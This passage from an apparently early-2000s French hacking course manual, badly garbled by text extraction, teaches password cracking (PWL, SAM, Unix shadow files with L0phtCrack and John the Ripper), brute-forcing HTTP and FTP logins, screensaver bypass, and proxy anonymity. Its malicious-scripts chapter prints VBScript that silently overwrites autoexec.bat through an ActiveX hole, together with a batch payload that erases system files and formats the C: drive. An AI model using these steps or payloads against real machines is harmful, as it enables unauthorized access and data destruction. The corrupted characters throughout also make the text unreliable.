)our commencer une attaque il faut slectionner le fichier .pCl en clickant sur le bouton M<roCseM, ,nsuite essaye* de clicker sur M@lideM .cette options ne fonctionne que pour les anciens fichiers )R6 de CindoCs4E et 5.77, elle #ous permet de #isualiser tous les pass sans m%me conna`tre un loginU0. $i jamais le M@lideM ne fonctionne pas, essaye* MCheck)assM, si le pass de session est #ide, il #ous sera possible d'accder a tous les autres pass contenu dans le fichier. Toujours rien S =n continu alors '0 6'attaque a#ec dictionnaire' Configure* une attaque par dictionnaire en clickant sur l'onglet M&ictionnaryM.

$electionne* ensuite le dictionnaire a utiliser en clickant sur MbroCseM. )our lancer #otre attaque clique* sur M$earch)assCordBastMou M$earch)assCordM... 6'attaque par brut Borce' clique* sur l'onglet M<rute forceM 6e param"tre M)assCord lengthM #ous permet de dfinir la longueur du mot de pass forcer .plus la plage est large, plus le nombre de combinaisons augmente0. MCharset stringM #ous indique les caract"res a utiliser durant le brut force .#ous pou#e* y inclure des chiffres ainsi que les caract"res spciau! comme M/M par e!emple0. )our lancer l'attaque clique* sur
The Hackademy DM 1J23441 S!SD"#AM

M$earch)assCordBastM .b rapide que M$earch)assCordM car il n'utilise pas les ;) CindoCs0, si l'attaque ne russie pas clique* sur M$earch)assCordM. l m'a fallut en#iron : minutes pour #enir a bout d'un passCord compos de : lettres... 6'attaque hybride' )our lancer une attaque hybride il suffit de retourner sur l'onglet dictionnaire et de cocher la case MHybrid bruteM.

-ous n'aborderons pas toutes les options de )R6tools mais si #ous #oule* en sa#oir plus aller faire un tour sur l'aide du soft en clickant sur MHelpM. ae #ous conseil de #ous intresser l'option MClient3$er#eurM qui permet de faire tra#ailler plusieurs machines simultanment sur le m%me fichier passCord .attaque distribue0. Contourner le pass Rin4! ' 6orsque que l'on dmarre Cin4! si des pass on t configur pour accder a l'=$, il #ous demande une identification par login et pass. -ous allons #oir dans cette section les di#erses techniques pour contourner cette identification.... 1,ssaye* de clique* sur MCancelM, normalement #ous de#rie* a#oir acc"s au syst"me. 1;u dmarrage de #otre ordinateur clique* sur MBKM pour faire appara`tre le menu de dmarrage .ou essayer de booter a partir d'une disque de dmarrage0. Choisisse* le mode ($1&=$. (aintenant il #a falloir changer l'e!tension des fichiers .pCl par autre chose pour emp%cher CindoCs de le trou#er. )our cela tapes la commande sui#ant ' rename c'eCindoCseg.pCl g.!!! 9elance* CindoCs, tape* un pass au hasard et #ous #erre* RindoCs #ous demander une confirmation de nou#eau pass. Cela signifie que le nou#eau pass que #ous tapere* sera directement affect au compte utilisateur slectionn .login0. 2.6e fichier $am de R --T ou R -2k' 6e Bichier $am' 6e syst"me RindoCs a 2 failles de cryptage qui permettent de dcrypter un fichier pass CindoCs plus #ite qu'un fichier pass 8ni! par e!emple. 6'une de ces failles pro#ient du hachage de 6;-manager car il di#ise les pass en cha`nes de J caract"res. 6'autre #ient de l'absence de salt .fonction rendant le hachage diffrent pour 2 pass identiques0.,n clair, si 2 utilisateurs choisissent le m%me pass, le cryptage sera e!actement le m%me, ce qui facilite la tache du hackeur. Comme pour Cin4!, il e!iste des softs qui permettent de cracker les mots de pass des utilisateurs ou de
The Hackademy DM 1J53441 S!SD"#AM

l'admin. $ur les syst"mes -T, les mots de pass sont sau#egards dans un fichier $;( .$ecurity ;ccount (anager0 crypt se trou#ant dans c'eR --Tesystem52econfige$;( . +ous ne pou#e* pas #isualiser ou copier le fichier $;( lorsque R --T tourne car il est #errouill par le noyau du syst"me.

;lors comment faire pour se procurer ce fichier SS 7.6orsque l'on installe R --T, une copie de la base de donnes des mots de pass .fichier $;(0 est cre dans le rpertoire c'eR --Terepair . Cette copie ne contient que les pass par dfaut cre lors de l'installation, donc seulement le pass de l'administrateur. .ce qui intresse le plus le hackeur0. 6orsque l'administrateur met jour le disque de dpannage, le fichier $;( est lui aussi mis a jour .dans ce cas la, le fichier $;( contient tous les comptes0. =n pourrait donc se procurer le fichier $;( a partir du dossier repair car celui ci n'est pas #errouill par le noyau. $i le dossier repair ne contient pas le fichier $;(, il #ous reste quand m%me une chance de l'obtenir... 2. l faut faire booter le )C a partir d'une disquette de dmarrage ou a partir d'un autre syst"me d'e!ploitation. ;insi R --T n'est pas e!cut et donc le fichier $;( n'est pas #errouill. =n peut donc copier le fichier $;( sur une disquette et le cracker par la suite. l faut sa#oir que le fichier $;( n'est pas le seul support qui permet de trou#er les pass sur un rseau utilisant -T. )renons comme e!emple 6HphtCrack qui est le plus rapide et le plus efficace pour trou#er les mots de pass -T. Car il n'utilise pas seulement le fichier $;( pour a#oir le hachage des mots de pass et e!ploite les 2 failles de cryptage #u prcdemment. +ous pou#e* #ous procurer une #ersion d'#aluation de 6C5 sur ' http'33CCC.atstake.com3research3lc53doCnload.html .

The Hackademy

DM

1J:3441

S!SD"#AM

,n premier lieu, l'assistant #ous demandera la mthode utilis pour rcuprer le hachage du mot de pass. .$i l'assistant ne s'est pas lanc automatiquement, clique* sur la baguette magique, F "me icone en partant de la gauche sur l'interface principale0 6C5 #ous propose : mthodes. 7.Brom the local machine )our utiliser cette options #ous de#e* a#oir le statut ;dministrateur sur la machine. Cette mthode #ous d#oilera tr"s rapidement les pass des utilisateurs. 2.Brom remote machine 6a aussi #ous de#e* %tre ;dministrateur, mais cette fois1ci, il rcupra le hachage du mot de pass a partir d'une machine distante de #otre domaine. .#ous de#re* spcifier le nom de la machine0.Cette mthode ne fonctionne pas sur une machine distante utilisant syskey ou Rin2k. 5.Brom -T :.H emergency repair disk Cette options utilisera le fameu! fichier $;(, celui se trou#ant dans c'eCinnterepair ou un enregistr sur une disquette. .#ous de#re* spcifier le fichier $;( a utiliser0 :.<y sniffing the local netCork ,t oui, 6C5 inclu m%me un sniffer pour intercepter le hachage des machines d'un rseau -T. ; utilis lorsque les utilisateurs se logguent sur le rseauN #ers Kh du matin par e!emple... .#ous de#re* spcifier la carte rseau0

The Hackademy

DM

1JE3441

S!SD"#AM

,nsuite il #ous demandera le mthode de forGage a utiliser.

Clique* sur MCustom =ptionsM pour personnalis l'attaque. 6C utilise les 5 mthodes de forGage #u au dbut du cours' 7.les attaques a#ec dictionnaire 2.les attaques par brute force 5.les attaques hybride

6a premi"re case reprsente l'attaque par dictionnaire .clicker sur <roCse pour lui indiquer le fichier passCord a utiliser0 6a deu!i"me, c'est pour l'attaque hybride, #ous pou#e* config l'attaque hybride dans le menu MBileM11L M)rfrencesM de la 'interface principale. 6a derni"re #ous l'aure* de#in, c'est pour le brut force .le M1M permet de spcifier une plage de caract"res, ici le brut force utilisera tous les caract"res de l'alphabet ainsi que tous les nombres0 si #ous dsire* changer de plage il #ous suffit de clicker sur la petite fl"che a droite.

Clique* sur M=?M et M$ui#antM pour la suite de la configuration de l'attaque. 6e menu ci1dessous #ous permet de choisir les informations qui seront #isualisable durant le craquage.

7ere case ' ;ffiche les passCords une fois qu'ils ont t trou#s, dans certains cas il est %tre utile de ne pas les affichs. 2eme case ' ;ffiche les hachage des passCord .les pass crypts0.
The Hackademy DM 1JF3441 S!SD"#AM

5eme case ' ;ffiche la dure pour le craquage de chaque passCord. :eme case ' ;fficher un a#ertissement quand l'attaque est finie. clique* sur sui#ant et attende* le rsultat N0 6e fichier passCd d'8ni!' 8ni! utilise un systeme de cryptage uni#oque. 6e fichier stockant les mots de pass sur 8ni! se trou#ent dans la plus part des distributions dans le rpertoire M3etc3M et se nomme MpassCdM. &ans les #ersions rcentes d'8ni! les fichier passCd t dcomposs en 2 fichiers, car le fichier passCd sur les anciennes #ersions taient accessibles tous. (eme si les pass taient crypts, cela facilitais la tache du crackeur. ,n tapant ' more 8etc8passCd sur un syst"me 8ni! on affiche le fichier passCd. 8n fichier passCd ressemble cela ' root'FTgy7@s.fTrf$'H'7';dmin'3'3sbin3sh john'?Ff9ti24nBrsc'7HH7'7H''3usr3john'3bin3sh sophie'HJ:j@hhT&s,2i'7HH2'7H''3usr3sophie'3bin3sh paul'fTq*=yHsKKsfd'7HH5'7H''3usr3paul'3bin3sh Bormat 11L login ' pass ' 8 & ' @ & ' nom complet ' repertoire perso ' shell ;ctuellement, il y a toujours le fichier passCd mais sans les pass dessus. 6es pass sont tous sau#egard dans le deu!i"me fichier qui se nomme shadoC. 6e fichier shadoC est seulement accessible si #ous a#e* le statut root sur la machine. ; noter, que le fichier passCd permet toujours au hackeur de sa#oir quels sont les logins des utilisateurs du syst"me pour se faire un dictionnaire. (aintenant dans la plupart des syst"mes 8ni!, les passCords on t remplac par M!M dans le fichier passCd ' root'!'H'7';dmin'3'3sbin3sh john'!'7HH7'7H''3usr3john'3bin3sh sophie'!'7HH2'7H''3usr3sophie'3bin3sh paul'!'7HH5'7H''3usr3paul'3bin3sh
The Hackademy DM 1JJ3441 S!SD"#AM

le fichier shadoC ' root'FTgy7@s.fTrf$'77FH:'''''' john'?Ff9ti24nBrsc''''''' sophie'HJ:j@hhT&s,2i''''''' paul'fTq*=yHsKKsfd''''''' format 11L login ' pass ' date ' min ' ma! ' a#ertissement ' e!piration ' dsacti#ation Comme pour -T, il e!iste des softs qui permettent de cracker les mots de pass 8ni!. )renons pour e!emple aohnXTheX9ipper qui fonctionne aussi sous RindoCs. .http'33CCC.openCall.com3john30

8ne fois le soft install, tape* les commandes sui#antes .dans cette e!emple, le fichier dictionnaire et passCd se trou#ent sur une disquette0'

The Hackademy

DM

1JK3441

S!SD"#AM

john 1test .pour #oir si john fonctionne correctement0 john 1single a'epassCd .mthode rapide de john pour cracker les pass0 john 1shoC a'epassCd .permet de #isualiser les pass cracks0 john 1C'a'edico.t!t a'epassCd .attaque a#ec dictionnaire0 john 1i a'epassCd .attaque par brut force0

III 9 Serveur
8ne des mani"res qui permet de pntrer sur un ser#eur est d'utiliser le cracking. )our cracker un site on peut utiliser un soft comme RebCrack qui permet de faire une attaque par dictionnaire sur une page utilisant l'authentification HTT).

Ci1dessus un e!emple d'identification HTT). Ci1contre l'interface principale de CCCcrack. )our utiliser CCCCrack il nous faut plusieurs dictionnaires. 8n pour les logins et un pour les pass. &ans MTarget 896M, il faut mettre l'896 cible que l'on dsire cracker. &ans notre e!emple on essaye de cracker une machine local, utilisant $R;T .interface HT(6 de $amba qui requi"re une authentification par login3mot de pass sur le port 4H70.

The Hackademy

DM

1J43441

S!SD"#AM

<rutus est un soft comme CCChack sauf qu'il permet de cracker di#ers ser#ices comme BT), )=)5, Telnet, $(<, etc... 6es options sont a peut pr%t les m%mes que pour les softs prcdents MConnection =ptionsM Target ' p cible Type ' Type de ser#ices .BT),Telnet,etc...0 )ort ' )ort cible Connections ' -ombre de conne!ions simultans Timeout ' &ure du timeout )ro!y ' pour utiliser un pro!y .se rfrer plus loin dans le cours0 M$er#ices =ptionsM $ui#ant le type de ser#ices slectionn #ous aure* di#erses options dans cette partie. M;uthentification =ptionsM )ass (ode ' type d'attaque .dico, hybride, brut force0 $ui#ant le mode choisi, #ous aure* di#erses options.

I7 9 Screensavers
6es mthodes pour contourner ou trou#er un pass d'ecran de #eille. 7.6orsque l'cran de #eille n'est pas actif ' 1 l est possible pour un pirate de #oir le mot de pass de #otre cran de #eille, grIce a un soft comme $creen $a#er )assCord .http'33CCC.ptorris.com30

,n un click il #ous affiche le mot de pass de #otre cran de #eille. 19cupere* le fichier user.dat se trou#ant dans c'eCindoCseprofileseYutilisateurZe . ,nregistre* le fichier sur une disquette, trou#e* une autre machine utilisant Rin4! et remplace* #otre fichier user.dat par celui que #ous a#e* rcupr. ,n utilisant le soft M$creen $a#er )assCordM #ous aure* directement le pass en clair.
The Hackademy DM 1KH3441 S!SD"#AM

2.6orsque l'cran de #eille est actif ' 1,ssaye* la combinaison CT96b;6Tb$8))9 pour essayer de faire appara`tre le gestionnaire de taches et ainsi dsacti#er le screensa#er. 19eboote* la machine sous &=$ pour rcuprer le fichier user.dat. 1;#ec Cdsa#er .http'33Celcome.to3Cangsdomain0 il est possible de creer un cd autobootable sous CindoCs qui permettrait de cracker un mot de pass d'cran de #eille actif, si l'options autobootC& de CindoCs est acti#e. Ce qui aurait pour effet de lancer automatiquement C&sa#er .soft de brut force0 directement partir du Cdrom.

7 9 Ast0ris>ues&
maginons #ous #ous connecte* internet de fassons automatique .le pass n'est pas demand a chaque dmarrage d'internet0. l serait facile pour quelqu'un qui aurait acc"s a #otre machine de #oir #otre pass grIce a un soft du genre $nadboy's 9#lation .http'33CCC.snadboy.com0 ou +u)assCord .http'33CCC.ptorris.com30. ;#ec 9#lation'

The Hackademy

DM

1K73441

S!SD"#AM

l suffit de faire un click gauche sur la cible, de maintenir le click et de dplacer la souris sur le pass a r#ler.+ous #erre* appara`tre le pass en clair sur 9#lation

7I 9 rotections
l e!iste une multitude de softs qui permet de cracker toute sorte de fichier protg .pCl, sam, *ip, e!cel, Cord, etc...0. l est donc important de '

Toujours choisir un mot de pass comportant un ma!imum de caract"res alphabtique, chiffres et caract"res spciau! .pour augmenter au ma!imum le temps que mettrait le hackeur a trou#er #otre pass. Changer asse* sou#ent de pass comme Ga le hacker n'aura sfrement pas le temps de cracker #otre pass, #u qu'il changera a chaque fois. (ettre un pass < =$ pour accder au $etup, au syst"me d'e!ploitation et changer la squence de boot pour #iter de booter a partir d'une disquette. h#iter de demander RindoCs de sau#egarder #os pass .access internet, messagerie, etc...0. nstaller un logiciel comme done;larm qui est simple d'utilisation pour ceu! qui n'ont jamais utilis de BireCall, ce qui #ous permettra de detecter toutes intrusions sur #otre machine et de bloquer certains port ou protocoles. ae #ous conseil aussi l'installation d'un anti#irus. (ettre jour #otre syst"me d'e!ploitation, ainsi que tous #os logiciels, le plus sou#ent possible. -e pas utiliser toujours le m%me pass pour #os di#erses identifications. Toujours changer le mot de pass par dfaut de tous les ser#ices install sur #otre machine. -e pas stock de fichier $;( sur son syst"me -T, qui puisse %tre accessible tous.

6ink' 1 http'33CCC.lostpassCord.com .site a#ec di#ers crackeurs de pass0 1 http'33CCC.*onelabs.com .site officiel pour tlcharger done;larm0 1 http'33CCC.try2hack.nl .Challenges pour tester #os capacits cracker un pass0

The Hackademy

DM

1K23441

S!SD"#AM

CHA IT"# IX Anonymat

The Hackademy

DM

1K53441

S!SD"#AM

I 2 Anonymat
(ais...comment font ces hackeurs pour cach leur ) SS $ur internet il e!iste di#ers ser#ices qui permettent de cacher #otre ) sui#ant le protocole utilis... l ne faut pas confondre ce que je #ais #ous dcrire ci1dessous a#ec ce que l'on appelle le MspoofingM. )our %tre anonyme en surfant la mthode la plus simple est de se trou#er un pro!y HTT) .pro!yReb0 qui se trou#e par dfaut sur le port KH ou KHKH.Certains scanners comme M)ro!y HunterM sont spcialiss dans la recherche de pro!y. $i #ous n'a#e* pas de pro!y sous la main, #ous pou#e* toujours utilis anonymi*er.com pour cach #otre ). l #ous suffit de taper ' Mhttp'33anon.free.anonymi*er.com3M sui#i de l'url a #isite.

The Hackademy

DM

1K:3441

S!SD"#AM

+ous pou#e* configurer , pour qu'il passe automatiquement par un pro!y chaque connections. )our cela clique* sur M=utilsM11LM=ptions nternet...M, onglet MConne!ionsM et M)aram"tres 6;-M. Cocher M8tiliser un ser#eur pro!yM et indique* lui l'adresse et le port du pro!y par lequel #ous #oule* passer.

$i #ous #oule* utilis (ultipro!y pour grer #ous connections #ous de#re* spcifier dans l'adresse' M72J.H.H.7M et le port ' MKHKKM.

The Hackademy

DM

1KE3441

S!SD"#AM

(ultipro!y est tlchargeable sur http'33CCC.multipro!y.org. (ultipro!y est tr"s utile car il #ous permet de' 1 changer de pro!y chaque pages #isites 1 tester toute une liste de pro!ies .rapidit, anonymat0 1 classer tous les pro!ies sui#ant leur #itesse clique* sur MCheck all pro!iesM pour dire (ultipro!y de #rifier chaque pro!y. clique* sur M=ptionsM, onglet M)ro!y $er#er 6istM. &ans cette fen%tre #ous pou#e* aperce#oir les pro!ies qu'utilise (ulipro!y. 8n pro!y prcd d'un cercle rouge, signifie qu'il ne fonctionne pas .#ous pou#e* le supprimer pour #iter de le tester a chaque dmarrage0.

)our ajouter une nou#elle liste de pro!y il suffit dj d'une trou#e une. ;lle* faire un tour sur http'33CCC.multipro!y.org3anonXlist.htm .Baites un copier coll de la liste dans un fichier te!te et nomm le pro!y.t!t par e!emple. ,nsuite, toujours dans l'onglet M)ro!y ser#ers listM clique* sur M(enuM 11L MBilesM 11L M mport pro!y listM.

l ne #ous reste plus qu'a lui indique le fichier importer et MCheckM de nou#eau tous les pro!y.

Baites un click droit sur l'ic>ne de (pro!y en bas a droite dans la barre

des taches.

The Hackademy

DM

1KF3441

S!SD"#AM

6e menu qui appara`t, #ous permet surtout d'acti#er l'utilisation de pro!y ou pas, d'un simple click au lieu de passer par les M)aram"tres 6;-M de ,.

11L passage par pro!y acti# 11L passage par pro!y desacti# +ous pou#e* tester #otre ;nonymat sur le site de la C- 6 ' http'33CCC.cnil.fr3traces3inde!.htm 8n bon site sur la #ie pri#e ' http'33CCC.anonymat.org3 (aintenant, je #ais #ous montrer comment pass par un pro!y sock .utilis pour le conne!ion permanentes0. ae #ais #ous montrer comment se connecter au tra#ers d'un pro!y sock en utilisant un petit soft comme sockcaps qui permet de faire passer n'importe quelle application par un pro!y sock. .utile dans le cas ou #ous #oule* faire passer une application par un sock qui ne le propose pas dans ses options0. +ous pou#e* tlcharger $ockcaps la 11L http'33CCC.clubic.com3t3gen3fl7HKJ.html . l faut sa#oir que les )ro!y $ock ne peu#ent pas etre utilis pour surfer. 6es socks sont utilis dans la plus part des cas pour se connecter sur un ser#eur BT), 9C, CA, etc... )ar dfaut les pro!y sock coutent sur le port 7HKH. &ans mon e!emple je #ais combiner sockcaps a#ec la commande ftp de CindoCs .c'eCindoCseftp.e!e0. Configuration de $ockcaps '

The Hackademy

DM

1KJ3441

S!SD"#AM

)our configurer $ockcaps clique* sur MBileM 11L M$ettingsM dans l'interface principale. 8ne fois sur l'onglet M$ocks $ettingsM, il #ous faut lui indiquer l'adresse du pro!y sock dans M$=C?$ $er#erM et le port qui est par dfaut 7HKH. 6a diffrence entre les $ocks #ersion : et E c'est que la #ersion : ne necessite pas d'identification par login et pass. +ous n'etes donc pas oblig de remplir M$ocks 8ser &M.

&"s que #otre sockcaps est bien configur, re#ene* a l'interface principale et clique* sur M-eCM.

The Hackademy

DM

1KK3441

S!SD"#AM

Clike* sur M<roCseM dans la fen%treM-eC ;pplication )rofileM et indique* sockcaps quel soft il doit faire pass par le pro!y $ock. &ans l'e!emple j'ai pris ftp.e!e se trou#ant dans le rpertoire c'eR --Tesystem52eftp.e!e .Rin2k0. Clike* sur M=?M pour refermer la fen%tre.

&ouble clique* sur le soft a lancer, partir de sockcaps ou clique* sur M9unM. 8n fen%tre &=$ a#ec l'in#ite ftp de#rait appara`tre...

(aintenant que ftp est lanc, il faut lui demander de se connecter un BT) #alide. )our cela tapes ' Mopen Y ) de la machineZM comme ci1dessous '

&es que #ous #oye* Mconnect Y ) de la machineZ c'est que #otre conne!ion a reussie UU +oil maintenant #ous %tes anonyme en utilisant la commande ftp N0 ;ttention ' l faut toujours relancer la commande ftp a partir de sockcaps sinon #ous n'utilisere* pas de pro!y...

The Hackademy

DM

1K43441

S!SD"#AM

CHA IT"# X Scripts malicieu1

The Hackademy

DM

14H3441

S!SD"#AM

I 9 /es fichiers =atch K?=atL


C'est partie du cours a pour but de #ous montrer l'utilisation que pourrait faire une personne mal#eillante a#ec des fichiers .bat .sans oublier autoe!ec.bat0, #ous apprendre les commandes &=$. )our mettre en oeu#re ce .bat on utilisera une faille ;cti#eD pour crer des fichiers .bat sur #otre disque. )our construire #otre premier fichier html, il #ous faudra juste un notepad RindoCs ou tout autre editeur de te!te. Cre* un nou#eau document te!te en faisant un click droit sur #otre bureau. -omme* le test.t!t pour le moment. =u#re* le en double clickant dessus. +oici la structure de base d'un fichier Html que #ous de#re* taper .sans les commentaires0 pour contruire une page blanche nomme M(a premi"re page internetM ' iHT(6L iH,;&L iU1 ici l'entete de #otre page #ous pou#e* y inclure par e!emple le titre de #otre page 1L iT T6,L(a premi"re page interneti3T T6,L i3H,;&L i<=&cL iU1 ici se trou#e le corps de #otre page, c'est dans cette partie que #ous de#re* inclure #otre script ;cti#eD1L i3<=&cL i3HT(6L ,ntre les balises MiU1M et M1LM #ous trou#ere* les commentaires qui n'apparaissent pas sur #otre na#igateur mais juste au ni#eau de la source de la page. )our plus d'info sur le language HT(6 11L http'33CCC.ac1grenoble.fr3gb3htmldoc.htm =n peut trou#er sur internet une multitude de scripts qui e!ploitent diffrentes failles pour lire, crire, modifier des fichiers sur un disque client. 6e script ci1dessous sera le script qui permettra l'criture d'un fichier .bat sur #otre disque. l est a inclure dans une page HT(6 entre les balises i<=&cL et i3<=&cL.

The Hackademy

DM

1473441

S!SD"#AM

iscript languagejM+<$criptML $et <atBile j B$=.CreateTe!tBile.Mc'eautoe!ec.batM, 2, Balse0 <atBile.Rrite6ine MYiciZM <atBile.Rrite6ine MYici sera inclu le contenu du fichier .bat ligne par ligne que nous #erront plus basZM <atBile.Close i3scriptL

-om du fichier .bat .dans notre e!emple on #a craser le fichier autoe!ec.bat0. ; la place du te!te en bleu soulign il faudra inclure ligne par ligne, le contenu du fichier .bat a crire. )assons maintenant l'e!plication et l'criture du contenu du fichier .bat. 6es fichiers .bat permettent l'e!cution automatique de commandes &=$ .et oui c'est aussi simple que Ga N0 6e fichier autoe!ec.bat de #otre Rin4! par e!emple e!cute toutes les commandes qu'on lui demande au dmarrage de RindoCs. )our pou#oir construire correctement notre fichier .bat, il faut conna`tre les principales commandes &=$ ' 6es commandes &=$ cd.. cd YrepertoireZ choice cls copy YfichierZ YdossierZ del YfichierZ dir 3p dir /echo off YcommandeZ echo. echo Yte!teZ edit YfichierZ erase Ychemin fichierZ re#ient au dossier racine aller dans un sous dossier l'utilisateur doit faire un choi! efface ce qu'il y a l'cran copie un fichier dans un dossier efface un fichier affiche le contenu d'un dossier en plusieurs fois affiche le contenu d'un dossier n'affiche pas les commandes la suite saute une ligne affiche le te!te se trou#ant a la suite affiche le fichier te!te et permet de l'diter efface un fichier .pas d'accord demand0

The Hackademy

DM

1423441

S!SD"#AM

format YlecteurZ goto if mem mkdir YdossierZ pause ren Yfichier7Z . Ynou#elle e!tensionZ rename Yfichier7Z Ynou#eau nomZ rmdir YdossierZ type Yfichier te!teZ #er #ol YlecteurZ c'eCindoCseg.g c'eCindoCseg. Ye!tensionZ

format un disque .accord #ictime demand0 demande de branchement .saut0 branchement conditionnel affiche l'espace disque cre un dossier pour que le programme continu, il faut appuyer sur une touche change l'e!tension du fichier 7 par la nou#elle e!tension renomme le fichier7 par le nou#eau nom efface un dossier affiche le contenu d'un fichier t!t affiche la #ersion du &=$ affiche le nom d'un lecteur indique tout le contenu d'un dossier .demande autorisation0 indique tous les fichiers d'un certains type du dossier CindoCs .pas d'autorisation demand0

)our a#oir plus d'aide sur le command dos il suffit dans une fen%tre &=$ de taper la commande #oulu sui#ie de M3SM. e!' c'eCindoCsecommandLping 3S Contenu du fichier .bat' +oici un e!emple qui obligerait la #ictime a tout rinstaller'

The Hackademy

DM

1453441

S!SD"#AM

/echo off erase c'eCindoCseg.e!e erase c'eCindoCsecommand.com erase c'eautoe!ec.bat erase c'ekeyb.com erase c'ekeyfr.com erase c'e?ey.com erase c'eansi.sys erase c'eCindoCseformat.com erase c'eCindoCseg.com cls dir3p c'eCindoCse pause echo. echo <onne reinstallation N0 echo. echo =n #a commencer par formater hein S pause #ol c' format c' Ce fichier est utilis a#ec beaucoup de prcautions... Chacune des lignes du fichier .bat est inclure dans notre script et notre fichier html est fini. l ne #ous reste plus qu'a le tester en double clickant dessus. Cela aura pour effet d'craser le fichier .bat et au prochain reboot, l'e!cution automatique de notre fichier .bat .autoe!ce.bat0. )rotection ' &sacti#er acti#eD dans les param"tres de #otre na#igateur ou #rifier le code source a#ant de l'e!cuter.

)our #oir la source d'une page nternet, clique* sur MaffichageM11LMsourceM dans ,.

l est important de bien paramtrer son na#igateur en utilisant les options de scuritde ,.

The Hackademy

DM

14:3441

S!SD"#AM

)our modifier les options de scurit clique* sur M=utilsM11 LM=ptions nternetM.=nglet M$curitM. ,n clickant sur M)ersonnaliser le ni#eau...M #ous pourre* dsacti#er l'e!cution du aa#ascript, ;cti#eD ou l'utilisation de cookies par e!emple. $i #ous ne sa#e* pas a quoi correspond une certaine option, je #ous conseil de mettre toujours l'option MdemanderM ou Mdsacti#erM.

The Hackademy

DM

14E3441

S!SD"#AM

@lossaire '
cracker ' )ersonne qui casse des protections logicielles. crasher ' personne qui dtruit un syst"me pour le plaisir. &=$ ' couche logicielle indpendante de RindoCs . 4K 7ere et $econde dition0 et intgre par la suite .(, et suprieures0 &o$ ' &ni de $er#ice, qui consiste bloquer un syst"me #ia, gnralement, du flood. &&o$ ' c'est lorsque plusieurs machines !cutent la m%me attaque sur une m%me cible dans le but d'un &o$. e!ploit ' moyen pour e!ploiter une faille sur un ser#eur. flag ' option qui spcifie le type d'un paquet au ni#eau de sa construction. flooder ' personne ou logiciel qui #a rpter un processus en boucle de sorte surcharger un syst"me. lamer ' ndi#idu nausabond qui passe ses journes emb%ter tout le monde sans raisons et qui ne prend pas conscience de sa stupidit. neCbie ' koi #ous sa#e* pas ce que c'est S nuke ' #ieille technique inemploye ce jour qui consiste en#oyer un paquet particulier un syst"me RindoCs 4E pour en altrer le fonctionnement. phreak ' technique de piratage des lignes tlphoniques et des rseau! de tlcommunication. smurf ' rutilisation d'un rseau dans le relai de paquets, pour surcharger une cible. sniffing ' mthode qui consiste espionner tous les paquets qui transitent sur un rseau social ,ngineer ' c'est une personne qui se fait passer pour une autre afin d'obtenir des informations pri#es dans la #ie relle. socket ' couche logicielle qui permet la communication rseau. spoofing ' mthode qui consiste camoufler l'adresse source d'un attaquant au ni#eau des paquets rseau! . )0

The Hackademy

DM

14F3441

S!SD"#AM

Contact

7 +illa du clos de (ale#art JEH77 )aris. Tel' H7 :H 27 H: 2K e1mail' hackademy/thehackademy.net

2F bis rue jeanne d';rc 4:7FH $t (and Tel' H7 E5 FF 4E 2K e1mail' abonnements/dmpfrance.com

The Hackademy

DM

14J3441

S!SD"#AM

theHACKADEMY,c'estaussi:
The hackadermy NournalO The hackademy manuel et d6autres num0ros sp0ciau1PPPPP

Alors n6h0siteH pas D vous a=onnerO en remplissant le formulaire suivant &

The Hackademy

DM

14K3441

S!SD"#AM

Cre par les formateurs de l'hackademy, $c$&9,;( est une $$ informatique. -ous apportons au! entreprises notre e!pertise pour assurer au! entreprises la fiabilit et la scurit de leur infrastructure informatique.

spcialise en scurit

-os domaines d'inter#ention'

Audit de s0curit0& il permet de faire une e!pertise globale de #otre syst"me .test intrusif, audit technique, audit de #ulnrabilit0. /es produits Systech s0curit0& &es solutions matrielles destines renforcer la scurit de #otre infrastructure, et assurant un sui#i performant de tout type d'#"nement rseau ou syst"me. /e d0velopement d6applications& &e la ma`trise d'oeu#re la conception technique, nous pou#ons inter#enir ou #ous conseiller dans toutes les phases du d#eloppement de #otre application.

CCC?sysdream?com

)our toute information' info/sysdream.com

The Hackademy

DM

1443441

S!SD"#AM

You might also like